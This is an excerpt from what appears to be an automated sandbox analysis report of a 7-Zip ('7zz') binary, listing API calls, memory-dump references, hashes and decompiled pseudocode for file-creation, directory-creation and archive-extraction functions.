0x0040b976
0x0040b97d
0x0040b982
0x0040b984
0x0040b999
0x0040b999
0x0040b99e
0x0040b9a3
0x0040b9a6
0x0040b9a9
0x0040b9ad
0x0040b9ad
0x0040b9ad
0x0040b9ad
0x0040b8da
0x0040b8e0
0x0040b8e5
0x0040b8e8
0x0040b8f0
0x0040b8f9
0x0040b8fa
0x0040b906
0x0040b914
0x0040b91e
0x0040b926
0x0040b92c
0x0040b92e
0x0040b9b5
0x0040b9bd

APIs

__EH_prolog.LIBCMT ref: 0040B8C4
AreFileApisANSI.KERNEL32(?,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?,59@), ref: 0040B8E8

Part of subcall function 0040B882: CreateFileA.KERNEL32(?,00000000,?,00000000,?,?,00000000,?,?,0040B919,?,00000001,?,?,?,00000001), ref: 0040B8A4

CreateFileW.KERNELBASE(?,?,?,00000000,0040B46E,00000000,00000000,?,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?), ref: 0040B954
CreateFileW.KERNEL32(?,00000003,00000000,00000000,?,?,00000000,00000003), ref: 0040B997

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: File$Create$ApisH_prolog
String ID:
API String ID: 1948390111-0
Opcode ID: 60f2d251b11104cdcd95bf28ceed5ff14f8943fe3f031ba99dde9439acaa2137
Instruction ID: 89dc2ad9e147b491d0c4ff48465b06effa766152703dd1648aaffece476b04d2
Opcode Fuzzy Hash: 60f2d251b11104cdcd95bf28ceed5ff14f8943fe3f031ba99dde9439acaa2137
Instruction Fuzzy Hash: 91318E72900209EFCF01AFA4DD418EEBB76EF58354F10452EF551772A1C7398A64DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409CCB Relevance: 6.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409CCB(WCHAR* __ecx) {
				int _t17;
				signed int _t19;
				int _t23;
				signed int _t26;
				void* _t50;
				intOrPtr _t55;

				E0046B890(E00473A84, _t50);
				_t55 =  *0x490a7c; // 0x1
				if(_t55 != 0) {
					_t17 = CreateDirectoryW(__ecx, 0); // executed
					if(_t17 == 0) {
						if(GetLastError() == 0xb7) {
							L8:
							_t19 = 0;
						} else {
							 *(_t50 - 0x18) = 0;
							 *((intOrPtr*)(_t50 - 0x14)) = 0;
							 *((intOrPtr*)(_t50 - 0x10)) = 0;
							E00401E9A(_t50 - 0x18, 3);
							 *((intOrPtr*)(_t50 - 4)) = 0;
							if(E0040B863(_t50 - 0x18) == 0) {
								E00407A18( *(_t50 - 0x18));
								goto L8;
							} else {
								_t23 = CreateDirectoryW( *(_t50 - 0x18), 0);
								_t19 = E00407A18( *(_t50 - 0x18)) & 0xffffff00 | _t23 != 0x00000000;
							}
						}
					} else {
						_t19 = 1;
					}
				} else {
					_t26 = E00409CBC( *((intOrPtr*)(E00409AD5(_t50 - 0x24, __ecx))));
					E00407A18( *((intOrPtr*)(_t50 - 0x24)));
					_t19 = _t26;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t19;
			}

0x00409cd0
0x00409cdb
0x00409ce5
0x00409d0f
0x00409d13
0x00409d24
0x00409d6b
0x00409d6b
0x00409d26
0x00409d2b
0x00409d2e
0x00409d31
0x00409d34
0x00409d3e
0x00409d48
0x00409d65
0x00000000
0x00409d4a
0x00409d4e
0x00409d5d
0x00409d5d
0x00409d48
0x00409d15
0x00409d15
0x00409d15
0x00409ce7
0x00409cf3
0x00409cfd
0x00409d03
0x00409d03
0x00409d73
0x00409d7b

APIs

__EH_prolog.LIBCMT ref: 00409CD0
CreateDirectoryW.KERNELBASE(?,00000000,0000005C,?,00000000), ref: 00409D0F

Part of subcall function 00409AD5: __EH_prolog.LIBCMT ref: 00409ADA
Part of subcall function 00409AD5: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00409AF6

Part of subcall function 00409CBC: CreateDirectoryA.KERNEL32(?,00000000,00409CF8,0000005C,?,00000000), ref: 00409CBF

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CreateDirectoryH_prolog$ApisFile
String ID:
API String ID: 299956159-0
Opcode ID: c1ed0e35f6580321ac6531ab909d6ea8b72f2d8cf8691d9e8c9056453fa2db36
Instruction ID: 5baa69c7bf3f06f08d1d002de2e3150f630ab666195b0682027b480874592da2
Opcode Fuzzy Hash: c1ed0e35f6580321ac6531ab909d6ea8b72f2d8cf8691d9e8c9056453fa2db36
Instruction Fuzzy Hash: 17119032E441059ACB14AFA5E8825AEBB79AF80314F10443FE405B32D2CB380E459BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00415D31 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 726
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00415D31(intOrPtr __ecx, signed int __edx, void* __eflags) {
				signed int _t453;
				signed int _t454;
				intOrPtr _t465;
				signed int _t468;
				signed int _t477;
				intOrPtr* _t485;
				signed int _t486;
				signed int _t487;
				signed char _t491;
				signed int _t496;
				intOrPtr _t505;
				signed int _t509;
				signed int _t519;
				signed int _t532;
				signed int _t539;
				signed int _t540;
				signed int _t544;
				intOrPtr _t553;
				intOrPtr _t554;
				intOrPtr _t563;
				signed int _t565;
				signed int _t573;
				signed int* _t581;
				signed int _t582;
				signed int _t589;
				signed int _t601;
				short* _t602;
				signed int _t610;
				signed int _t612;
				void* _t614;
				signed int _t617;
				signed int _t618;
				signed int _t620;
				void* _t623;
				signed int _t626;
				signed int* _t631;
				signed int _t632;
				signed int _t661;
				char* _t662;
				signed int _t669;
				intOrPtr* _t670;
				intOrPtr* _t671;
				intOrPtr* _t672;
				intOrPtr _t714;
				signed int* _t724;
				signed int _t747;
				void* _t748;
				intOrPtr _t756;
				signed int _t770;
				signed int _t771;
				signed int _t780;
				signed int _t785;
				signed int _t786;
				signed int _t788;
				signed int _t790;
				void* _t791;

				_t770 = __edx;
				E0046B890(E004749BF, _t791);
				_t780 =  *(_t791 + 0x24);
				 *((intOrPtr*)(_t791 - 0x34)) = __ecx;
				 *((intOrPtr*)(_t791 - 0x4c)) = __edx;
				 *((intOrPtr*)(_t780 + 0x20)) = 0;
				 *((intOrPtr*)(_t780 + 0x18)) = 0;
				 *((intOrPtr*)(_t780 + 0x10)) = 0;
				 *((intOrPtr*)(_t780 + 8)) = 0;
				 *_t780 = 0;
				 *((intOrPtr*)(_t780 + 0x24)) = 0;
				 *((intOrPtr*)(_t780 + 0x1c)) = 0;
				 *((intOrPtr*)(_t780 + 0x14)) = 0;
				 *((intOrPtr*)(_t780 + 0xc)) = 0;
				 *(_t780 + 4) = 0;
				 *((intOrPtr*)(_t780 + 0x28)) = 0;
				 *(_t791 - 0x18) = 0;
				 *(_t791 - 0x14) = 0;
				E00404AD0(_t791 - 0xe8, 8);
				 *((intOrPtr*)(_t791 - 0xe8)) = 0x47a688;
				 *(_t791 - 4) = 0;
				if( *( *(_t791 + 0x14)) == 0) {
					_t453 =  *( *((intOrPtr*)(_t791 + 8)) + 8);
				} else {
					_t453 = 1;
				}
				_t785 = 0;
				 *(_t791 - 0x24) = _t453;
				if(_t453 <= 0) {
					L8:
					_push(0xf8);
					_t454 = E004079F2();
					_t661 = _t454;
					 *(_t791 + 0x24) = _t661;
					 *(_t791 - 4) = 2;
					if(_t661 == 0) {
						goto L12;
					} else {
						L112();
						_t786 = _t454;
					}
				} else {
					do {
						E0040351A(_t791 - 0x70);
						 *(_t791 - 4) = 1;
						 *(_t791 - 0x98) = 0;
						 *((intOrPtr*)(_t791 - 0x94)) = 0;
						_t801 =  *( *(_t791 + 0x14));
						if( *( *(_t791 + 0x14)) != 0) {
							goto L7;
						} else {
							_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)) + 0xc)) + _t785 * 4)))));
							if(E0040B431(_t791 - 0x98, _t770, _t801) == 0) {
								 *(_t791 + 0x14) = "there is no such archive";
								E0046B8F4(_t791 + 0x14, 0x47cf70);
								L11:
								 *(_t791 + 0x14) = "can\'t decompress folder";
								E0046B8F4(_t791 + 0x14, 0x47cf70);
								L12:
								_t786 = 0;
								__eflags = 0;
							} else {
								if(( *(_t791 - 0x78) >> 0x00000004 & 0x00000001) != 0) {
									goto L11;
								} else {
									goto L7;
								}
							}
						}
						goto L13;
						L7:
						E0042389F(_t791 - 0xe8,  *(_t791 - 0x98),  *((intOrPtr*)(_t791 - 0x94)));
						 *(_t791 - 0x18) =  *(_t791 - 0x18) +  *(_t791 - 0x98);
						 *(_t791 - 4) = 0;
						asm("adc [ebp-0x14], ecx");
						E00407A18( *((intOrPtr*)(_t791 - 0x70)));
						_t785 = _t785 + 1;
					} while (_t785 <  *(_t791 - 0x24));
					goto L8;
				}
				L13:
				 *(_t791 - 4) = 0;
				 *(_t791 - 0xec) = _t786;
				if(_t786 != 0) {
					 *((intOrPtr*)( *_t786 + 4))(_t786);
				}
				_t662 =  *(_t791 + 0x14);
				 *(_t791 - 4) = 3;
				_t771 = _t770 & 0xffffff00 |  *(_t791 - 0x24) - 0x00000001 > 0x00000000;
				 *((intOrPtr*)(_t786 + 0xe8)) = 0;
				 *((intOrPtr*)(_t786 + 0xe0)) = 0;
				 *((intOrPtr*)(_t786 + 0xd8)) = 0;
				 *(_t786 + 0xbb) = _t771;
				 *(_t786 + 0x30) = _t662[8];
				 *(_t786 + 0x34) = _t662[0xc];
				 *((intOrPtr*)(_t786 + 0xec)) = 0;
				 *((intOrPtr*)(_t786 + 0xe4)) = 0;
				 *((intOrPtr*)(_t786 + 0xdc)) = 0;
				 *((intOrPtr*)(_t786 + 0xf0)) = 0;
				if(_t771 == 0) {
					L20:
					__eflags =  *(_t791 - 0x24);
					 *(_t791 - 0x20) = 0;
					if( *(_t791 - 0x24) <= 0) {
						L79:
						__eflags = _t786;
						 *((intOrPtr*)(_t780 + 0x18)) =  *((intOrPtr*)(_t786 + 0xd8));
						 *((intOrPtr*)(_t780 + 0x1c)) =  *((intOrPtr*)(_t786 + 0xdc));
						 *((intOrPtr*)(_t780 + 0x20)) =  *((intOrPtr*)(_t786 + 0xe0));
						 *((intOrPtr*)(_t780 + 0x24)) =  *((intOrPtr*)(_t786 + 0xe4));
						 *((intOrPtr*)(_t780 + 8)) =  *((intOrPtr*)(_t786 + 0xe8));
						 *((intOrPtr*)(_t780 + 0xc)) =  *((intOrPtr*)(_t786 + 0xec));
						 *((intOrPtr*)(_t780 + 0x28)) =  *((intOrPtr*)(_t786 + 0xf0));
						 *(_t791 - 4) = 0;
						asm("cdq");
						 *_t780 =  *( *((intOrPtr*)(_t791 + 8)) + 8);
						 *(_t780 + 4) = _t771;
						_t465 =  *((intOrPtr*)(_t786 + 0xd0));
						 *((intOrPtr*)(_t780 + 0x10)) =  *((intOrPtr*)(_t465 + 0x20));
						 *((intOrPtr*)(_t780 + 0x14)) =  *((intOrPtr*)(_t465 + 0x24));
						if(_t786 != 0) {
							 *((intOrPtr*)( *_t786 + 8))(_t786);
						}
						 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
						E00408604(_t791 - 0xe8);
						_t468 = 0;
						__eflags = 0;
						goto L82;
					} else {
						do {
							 *(_t791 + 0x24) =  *( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)) + 0xc)) +  *(_t791 - 0x20) * 4);
							E0040351A(_t791 - 0x70);
							 *(_t791 - 4) = 4;
							__eflags =  *( *(_t791 + 0x14));
							if(__eflags == 0) {
								_t669 = _t791 - 0x98;
								_push( *( *(_t791 + 0x24)));
								_t477 = E0040B431(_t669, _t771, __eflags);
								__eflags = _t477;
								if(_t477 == 0) {
									L111:
									 *(_t791 + 0x14) = "there is no such archive";
									E0046B8F4(_t791 + 0x14, 0x47cf70);
									E0046B890(E00474A50, _t791);
									_push(_t669);
									_push(_t669);
									_push(0);
									_push(_t786);
									_t788 = _t669;
									_push(_t780);
									 *(_t791 - 0x10) = _t788;
									 *_t788 = 0x47ab60;
									 *((intOrPtr*)(_t788 + 4)) = 0x47a78c;
									 *((intOrPtr*)(_t788 + 8)) = 0x47ab50;
									 *((intOrPtr*)(_t788 + 0xc)) = 0;
									 *((intOrPtr*)(_t788 + 0x18)) = 0;
									 *(_t791 - 4) = 0;
									 *((intOrPtr*)(_t788 + 0x1c)) = 0;
									 *((intOrPtr*)(_t788 + 0x20)) = 0;
									_t670 = _t788 + 0x24;
									 *(_t791 - 4) = 2;
									 *_t670 = 0;
									 *((intOrPtr*)(_t670 + 4)) = 0;
									 *((intOrPtr*)(_t670 + 8)) = 0;
									E00401E9A(_t670, 3);
									_t671 = _t788 + 0x38;
									 *(_t791 - 4) = 3;
									 *_t671 = 0;
									 *((intOrPtr*)(_t671 + 4)) = 0;
									 *((intOrPtr*)(_t671 + 8)) = 0;
									E00401E9A(_t671, 3);
									_t672 = _t788 + 0x44;
									 *(_t791 - 4) = 4;
									 *_t672 = 0;
									 *((intOrPtr*)(_t672 + 4)) = 0;
									 *((intOrPtr*)(_t672 + 8)) = 0;
									E00401E9A(_t672, 3);
									 *((char*)(_t788 + 0x5a)) = 1;
									 *((char*)(_t788 + 0x5b)) = 1;
									 *((char*)(_t788 + 0x5c)) = 1;
									 *((intOrPtr*)(_t788 + 0x98)) = 0;
									 *((intOrPtr*)(_t788 + 0xa0)) = 0;
									_t485 = _t788 + 0xa4;
									 *((intOrPtr*)(_t485 + 4)) = 0;
									 *((intOrPtr*)(_t485 + 8)) = 0;
									 *((intOrPtr*)(_t485 + 0xc)) = 0;
									 *((intOrPtr*)(_t485 + 0x10)) = 4;
									 *_t485 = 0x47a420;
									_t782 = _t788 + 0xbc;
									 *((char*)(_t788 + 0xbb)) = 0;
									 *((intOrPtr*)(_t788 + 0xbc)) = 0;
									_push(0x38);
									 *(_t791 - 4) = 9;
									 *_t788 = 0x47ab30;
									 *((intOrPtr*)(_t788 + 4)) = 0x47ab20;
									 *((intOrPtr*)(_t788 + 8)) = 0x47ab10;
									_t486 = E004079F2();
									 *(_t791 - 0x14) = _t486;
									__eflags = _t486;
									 *(_t791 - 4) = 0xa;
									if(_t486 == 0) {
										_t487 = 0;
										__eflags = 0;
									} else {
										_t487 = E0040F3E5(_t486);
									}
									 *(_t791 - 4) = 9;
									 *((intOrPtr*)(_t788 + 0xd0)) = _t487;
									E0040C9B4(_t782, _t487);
									 *[fs:0x0] =  *((intOrPtr*)(_t791 - 0xc));
									return _t788;
								} else {
									_t491 =  *(_t791 - 0x78) >> 4;
									__eflags = _t491 & 0x00000001;
									if((_t491 & 0x00000001) != 0) {
										goto L111;
									} else {
										goto L25;
									}
								}
							} else {
								 *(_t791 - 0x98) = 0;
								 *((intOrPtr*)(_t791 - 0x94)) = 0;
								 *(_t791 - 0x78) = 0;
								L25:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x18))();
								_t496 =  *((intOrPtr*)( *( *(_t791 + 0x1c)) + 0x24))( *( *(_t791 + 0x24)));
								__eflags = _t496;
								 *(_t791 - 0x1c) = _t496;
								if(_t496 != 0) {
									E00407A18( *((intOrPtr*)(_t791 - 0x70)));
									__eflags = _t786;
									 *(_t791 - 4) = 0;
									if(_t786 != 0) {
										 *((intOrPtr*)( *_t786 + 8))(_t786);
									}
									_t790 =  *(_t791 - 0x1c);
									goto L110;
								} else {
									E004033DB(_t791 - 0xd4);
									 *(_t791 - 4) = 5;
									E00404AD0(_t791 - 0x48, 4);
									 *(_t791 - 4) = 6;
									 *((intOrPtr*)(_t791 - 0x48)) = 0x47a668;
									E0040862D();
									_push( *((intOrPtr*)(_t791 - 0x4c)));
									L00443F76(_t791 - 0x48);
									_t505 =  *((intOrPtr*)(_t791 - 0x4c));
									 *(_t791 - 4) = 7;
									__eflags =  *(_t505 + 8);
									if( *(_t505 + 8) == 0) {
										_t747 =  *(_t791 + 0x24);
										_t601 =  *(_t747 + 4);
										__eflags = _t601;
										if(_t601 != 0) {
											_t748 =  *_t747;
											_t602 = _t748 + _t601 * 2 - 2;
											while(1) {
												__eflags =  *_t602 - 0x2e;
												if( *_t602 == 0x2e) {
													break;
												}
												__eflags = _t602 - _t748;
												if(_t602 == _t748) {
													_t125 = _t791 - 0x10;
													 *_t125 =  *(_t791 - 0x10) | 0xffffffff;
													__eflags =  *_t125;
												} else {
													_t602 = _t602;
													continue;
												}
												L34:
												__eflags =  *(_t791 - 0x10);
												if( *(_t791 - 0x10) >= 0) {
													E004072C9( *(_t791 + 0x24), _t791 - 0x58,  *(_t791 - 0x10) + 1);
													 *(_t791 - 4) = 8;
													_t610 = E00417651( *((intOrPtr*)(_t791 - 0x34)), _t791 - 0x58);
													__eflags = _t610;
													 *(_t791 - 0x1c) = _t610;
													if(_t610 >= 0) {
														_t612 = E00408053( *((intOrPtr*)(_t791 - 0x58)), L"001");
														__eflags = _t612;
														if(_t612 == 0) {
															_t614 = E00407399( *(_t791 + 0x24), _t791 - 0x104,  *(_t791 - 0x10));
															 *(_t791 - 4) = 9;
															E00401E26(_t791 - 0x58, _t614);
															 *(_t791 - 4) = 8;
															E00407A18( *((intOrPtr*)(_t791 - 0x104)));
															_t617 =  *(_t791 - 0x54);
															__eflags = _t617;
															if(_t617 != 0) {
																_t756 =  *((intOrPtr*)(_t791 - 0x58));
																_t618 = _t756 + _t617 * 2 - 2;
																while(1) {
																	__eflags =  *_t618 - 0x2e;
																	if( *_t618 == 0x2e) {
																		break;
																	}
																	__eflags = _t618 - _t756;
																	if(_t618 == _t756) {
																		_t620 = _t618 | 0xffffffff;
																		__eflags = _t620;
																	} else {
																		_t618 = _t618;
																		continue;
																	}
																	L44:
																	__eflags = _t620;
																	if(_t620 >= 0) {
																		_t623 = E004072C9(_t791 - 0x58, _t791 - 0xf8, _t620 + 1);
																		 *(_t791 - 4) = 0xa;
																		 *(_t791 - 0x10) = E00417651( *((intOrPtr*)(_t791 - 0x34)), _t623);
																		 *(_t791 - 4) = 8;
																		E00407A18( *((intOrPtr*)(_t791 - 0xf8)));
																		__eflags =  *(_t791 - 0x10);
																		if( *(_t791 - 0x10) >= 0) {
																			_t626 = E0040807A(L"rar");
																			__eflags = _t626;
																			if(_t626 != 0) {
																				E00415C6D(_t791 - 0x48,  *(_t791 - 0x10));
																				E00415C6D(_t791 - 0x48,  *(_t791 - 0x1c));
																			}
																		}
																	}
																	goto L48;
																}
																_t620 = _t618 - _t756 >> 1;
																goto L44;
															}
														}
													}
													L48:
													 *(_t791 - 4) = 7;
													E00407A18( *((intOrPtr*)(_t791 - 0x58)));
												}
												goto L49;
											}
											 *(_t791 - 0x10) = _t602 - _t748 >> 1;
											goto L34;
										}
									}
									L49:
									_push( *((intOrPtr*)(_t791 + 0x18)));
									_push( *(_t791 + 0x24));
									_push(0);
									_push( *( *(_t791 + 0x14)));
									_push(_t791 - 0x48);
									_push( *((intOrPtr*)(_t791 - 0x34)));
									_t509 = E00418A23(_t791 - 0xd4); // executed
									__eflags = _t509 - 0x80004004;
									 *(_t791 - 0x10) = _t509;
									if(_t509 == 0x80004004) {
										 *(_t791 - 4) = 5;
										E00408604(_t791 - 0x48);
										 *(_t791 - 4) = 4;
										E00403411(_t791 - 0xd4);
										E00407A18( *((intOrPtr*)(_t791 - 0x70)));
										__eflags = _t786;
										 *(_t791 - 4) = 0;
										if(_t786 != 0) {
											 *((intOrPtr*)( *_t786 + 8))(_t786);
										}
										_t790 = 0x80004004;
										goto L110;
									} else {
										 *((char*)(_t791 - 0x9c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x14))();
										_t771 =  *( *(_t791 + 0x1c));
										_t519 =  *((intOrPtr*)(_t771 + 0x28))( *( *(_t791 + 0x24)),  *(_t791 - 0x10),  *((intOrPtr*)(_t791 - 0x9c)));
										__eflags = _t519;
										 *(_t791 + 0x24) = _t519;
										if(_t519 != 0) {
											 *(_t791 - 4) = 5;
											E00408604(_t791 - 0x48);
											 *(_t791 - 4) = 4;
											E00403411(_t791 - 0xd4);
											E00407A18( *((intOrPtr*)(_t791 - 0x70)));
											__eflags = _t786;
											 *(_t791 - 4) = 0;
											if(_t786 != 0) {
												 *((intOrPtr*)( *_t786 + 8))(_t786);
											}
											_t790 =  *(_t791 + 0x24);
											goto L110;
										} else {
											__eflags =  *(_t791 - 0x10);
											if( *(_t791 - 0x10) != 0) {
												goto L78;
											} else {
												__eflags =  *( *(_t791 + 0x14));
												if( *( *(_t791 + 0x14)) != 0) {
													L58:
													__eflags =  *(_t791 - 0xb8);
												} else {
													__eflags =  *(_t791 - 0xb8);
													 *(_t791 - 0x10) = 0;
													if(__eflags > 0) {
														do {
															_t589 = E0040373D(_t771,  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xb4)) +  *(_t791 - 0x10) * 4)));
															__eflags = _t589;
															 *(_t791 + 0x24) = _t589;
															if(_t589 >= 0) {
																__eflags =  *(_t791 + 0x24) -  *(_t791 - 0x20);
																if( *(_t791 + 0x24) >  *(_t791 - 0x20)) {
																	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)))) + 4))( *(_t791 + 0x24), 1);
																	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0xc)))) + 4))( *(_t791 + 0x24), 1);
																	_t201 = _t791 - 0x18;
																	 *_t201 =  *(_t791 - 0x18) -  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xdc)) +  *(_t791 + 0x24) * 8));
																	__eflags =  *_t201;
																	asm("sbb [ebp-0x14], eax");
																	E00408784(_t791 - 0xe8,  *(_t791 + 0x24), 1);
																	 *(_t791 - 0x24) =  *( *((intOrPtr*)(_t791 + 8)) + 8);
																}
															}
															 *(_t791 - 0x10) =  *(_t791 - 0x10) + 1;
															__eflags =  *(_t791 - 0x10) -  *(_t791 - 0xb8);
														} while ( *(_t791 - 0x10) <  *(_t791 - 0xb8));
														goto L58;
													}
												}
												if(__eflags == 0) {
													L61:
													 *((intOrPtr*)(_t791 - 0x30)) = 0;
													 *(_t791 - 0x2c) = 0;
													 *((intOrPtr*)(_t791 - 0x28)) = 0;
													E00401E9A(_t791 - 0x30, 3);
													 *(_t791 - 4) = 0xb;
													_t532 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x10))(_t791 - 0x30);
													__eflags = _t532;
													 *(_t791 + 0x24) = _t532;
													if(_t532 != 0) {
														E00407A18( *((intOrPtr*)(_t791 - 0x30)));
														 *(_t791 - 4) = 5;
														E00408604(_t791 - 0x48);
														 *(_t791 - 4) = 4;
														E00403411(_t791 - 0xd4);
														E00407A18( *((intOrPtr*)(_t791 - 0x70)));
														__eflags = _t786;
														 *(_t791 - 4) = 0;
														if(_t786 != 0) {
															 *((intOrPtr*)( *_t786 + 8))(_t786);
														}
														_t790 =  *(_t791 + 0x24);
														goto L110;
													} else {
														__eflags =  *(_t791 - 0x2c);
														if( *(_t791 - 0x2c) == 0) {
															L64:
															_t539 =  *(_t791 - 0xcc);
															 *(_t791 + 0x24) = 0;
															__eflags = _t539;
															if(_t539 <= 0) {
																L68:
																_t540 =  *( *((intOrPtr*)(_t791 - 0xc8)) + _t539 * 4 - 4);
																 *(_t791 + 0x24) = _t540;
																__eflags =  *( *(_t791 + 0x14));
																if( *( *(_t791 + 0x14)) != 0) {
																	L71:
																	__eflags = 0;
																} else {
																	__eflags =  *(_t791 - 0x74);
																	if(__eflags != 0) {
																		goto L71;
																	} else {
																		_push(1);
																		_pop(0);
																	}
																}
																 *((char*)(_t540 + 0x2c)) = 0;
																 *((intOrPtr*)(_t540 + 0x24)) =  *((intOrPtr*)(_t791 - 0x80));
																 *((intOrPtr*)(_t540 + 0x28)) =  *((intOrPtr*)(_t791 - 0x7c));
																asm("adc ecx, [ebp-0x94]");
																_t544 = E00416922( *(_t791 + 0x24),  *((intOrPtr*)(_t791 + 0x10)), __eflags,  *((intOrPtr*)(_t791 - 0xac)) +  *(_t791 - 0x98),  *(_t791 - 0xa8),  *(_t791 + 0x14),  *(_t791 + 0x1c), _t786,  *((intOrPtr*)(_t791 + 0x20)), _t791 - 0x60); // executed
																__eflags = _t544;
																 *(_t791 + 0x24) = _t544;
																if(_t544 != 0) {
																	E00407A18( *((intOrPtr*)(_t791 - 0x30)));
																	 *(_t791 - 4) = 5;
																	E00408604(_t791 - 0x48);
																	 *(_t791 - 4) = 4;
																	E00403411(_t791 - 0xd4);
																	E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																	__eflags = _t786;
																	 *(_t791 - 4) = 0;
																	if(_t786 != 0) {
																		 *((intOrPtr*)( *_t786 + 8))(_t786);
																	}
																	_t790 =  *(_t791 + 0x24);
																	goto L110;
																} else {
																	__eflags =  *( *(_t791 + 0x14));
																	if( *( *(_t791 + 0x14)) != 0) {
																		_t771 =  *(_t791 - 0x5c);
																		_t714 =  *((intOrPtr*)(_t791 - 0x60));
																	} else {
																		_t771 =  *(_t791 - 0xa8);
																		_t714 =  *((intOrPtr*)(_t791 - 0xac)) +  *(_t791 - 0x98);
																		asm("adc edx, [ebp-0x94]");
																		 *((intOrPtr*)(_t791 - 0x60)) = _t714;
																		 *(_t791 - 0x5c) = _t771;
																	}
																	 *((intOrPtr*)( *((intOrPtr*)(_t786 + 0xd0)) + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t786 + 0xd0)) + 0x20)) + _t714;
																	asm("adc [eax+0x24], edx");
																	_t553 =  *((intOrPtr*)(_t786 + 0xd0));
																	 *((intOrPtr*)(_t553 + 0x28)) =  *((intOrPtr*)(_t786 + 0xe8));
																	 *((intOrPtr*)(_t553 + 0x2c)) =  *((intOrPtr*)(_t786 + 0xec));
																	_t554 =  *((intOrPtr*)(_t791 + 0x20));
																	_push( *((intOrPtr*)(_t791 - 0x30)));
																	__eflags =  *(_t554 + 4);
																	if( *(_t554 + 4) != 0) {
																		E00407A18();
																		 *(_t791 - 4) = 5;
																		E00408604(_t791 - 0x48);
																		 *(_t791 - 4) = 4;
																		E00403411(_t791 - 0xd4);
																		E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																		__eflags = _t786;
																		 *(_t791 - 4) = 0;
																		if(_t786 != 0) {
																			 *((intOrPtr*)( *_t786 + 8))(_t786);
																		}
																		_t790 = 0x80004005;
																		goto L110;
																	} else {
																		E00407A18();
																		goto L78;
																	}
																}
															} else {
																do {
																	_t563 =  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xc8)) +  *(_t791 + 0x24) * 4));
																	__eflags =  *(_t563 + 0x34);
																	if( *(_t563 + 0x34) == 0) {
																		goto L67;
																	} else {
																		_t724 =  *(_t791 + 0x1c);
																		_t565 =  *((intOrPtr*)( *_t724 + 0x1c))(_t724,  *((intOrPtr*)(_t563 + 0x30)));
																		__eflags = _t565;
																		 *(_t791 - 0x1c) = _t565;
																		if(_t565 != 0) {
																			E00407A18( *((intOrPtr*)(_t791 - 0x30)));
																			 *(_t791 - 4) = 5;
																			E00408604(_t791 - 0x48);
																			 *(_t791 - 4) = 4;
																			E00403411(_t791 - 0xd4);
																			E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																			__eflags = _t786;
																			 *(_t791 - 4) = 0;
																			if(_t786 != 0) {
																				 *((intOrPtr*)( *_t786 + 8))(_t786);
																			}
																			_t790 =  *(_t791 - 0x1c);
																			goto L110;
																		} else {
																			goto L67;
																		}
																	}
																	goto L116;
																	L67:
																	_t539 =  *(_t791 - 0xcc);
																	 *(_t791 + 0x24) =  *(_t791 + 0x24) + 1;
																	__eflags =  *(_t791 + 0x24) - _t539;
																} while ( *(_t791 + 0x24) < _t539);
																goto L68;
															}
														} else {
